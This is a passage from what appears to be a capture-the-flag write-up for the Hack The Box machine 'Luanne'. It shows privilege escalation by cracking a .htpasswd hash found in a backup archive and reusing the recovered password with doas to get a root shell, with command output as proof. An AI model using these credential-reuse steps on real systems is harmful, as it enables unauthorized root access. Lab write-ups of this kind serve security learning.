Privilege Escalation
Earlier, I learned that the r.michaels user is basically the root user defined by the configuration file of doas
luanne$ doas -u root id
password:
doas: authentication failedAfter making a lateral movement to the r.michaels user, attempting to check the doas command was the first thing that I did
I failed to do so as it prompted me for a password, which I didn’t have at the time
Then I found out that the .htpasswd file in the backup archive is different from the .htpasswd file in the /var/www directory
I followed up by cracking the password hash.
Here, I will test it for password reuse and attempt to escalate privileges to the root user
luanne$ doas -u root id
password: littlebear
uid=0(root) gid=0(wheel) groups=0(wheel),2(kmem),3(sys),4(tty),5(operator),20(staff),31(guest),34(nvmm)Password reuse confirmed
luanne$ doas -u root su root
password: littlebear
# whoami
root
# hostname
luanne.htb
# /sbin/ifconfig
vmx0: flags=0x8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
capabilities=7fd80<TSO4,IP4CSUM_Rx,TCP4CSUM_Rx,TCP4CSUM_Tx>
capabilities=7fd80<UDP4CSUM_Rx,UDP4CSUM_Tx,TCP6CSUM_Rx,TCP6CSUM_Tx>
capabilities=7fd80<UDP6CSUM_Rx,UDP6CSUM_Tx,TSO6>
enabled=0
ec_capabilities=7<VLAN_MTU,VLAN_HWTAGGING,JUMBO_MTU>
ec_enabled=2<VLAN_HWTAGGING>
address: 00:50:56:b9:f2:06
media: Ethernet autoselect (10Gbase-T)
status: active
inet 10.10.10.218/24 broadcast 10.10.10.255 flags 0x0
inet6 fe80::250:56ff:feb9:f206%vmx0/64 flags 0x0 scopeid 0x1
lo0: flags=0x8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 33624
inet 127.0.0.1/8 flags 0x0
inet6 ::1/128 flags 0x20<NODAD>
inet6 fe80::1%lo0/64 flags 0x0 scopeid 0x2System Level Compromise